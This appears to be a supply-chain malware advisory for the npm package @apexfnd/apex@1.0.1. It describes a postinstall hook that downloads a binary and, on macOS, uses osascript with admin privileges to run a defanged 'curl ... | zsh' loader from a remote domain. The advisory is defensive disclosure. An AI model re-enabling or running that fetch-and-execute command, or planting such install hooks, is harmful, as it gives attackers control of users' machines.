LWA-2026-7006 MAL-2026-11121 ↗ confirmed malware

@apexfnd/apex@1.0.1

Malicious code in @apexfnd/apex (npm)

T1195.002 · Compromise Software Supply ChainT1059.007 · JavaScriptT1105 · Ingress Tool TransferT1071.001 · Web ProtocolsT1059.004 · Unix Shell

Analysis

The postinstall hook in install.cjs downloads a binary from github[.]com/Apex-Foundation/copilot, and on macOS writes a temporary AppleScript that executes 'curl -fsSL hxxps://update[.]apex-arena-router[.]com/loader[.]sh | zsh' with administrator privileges via osascript, prompting the user for their admin password. The domain update[.]apex-arena-router[.]com is a remote code delivery endpoint. The package also downloads a platform-specific binary from GitHub releases.

analyzed by
Leitwacht
first seen
Jul 21, 2026, 11:34 PM
analyzed
Jul 21, 2026, 11:36 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.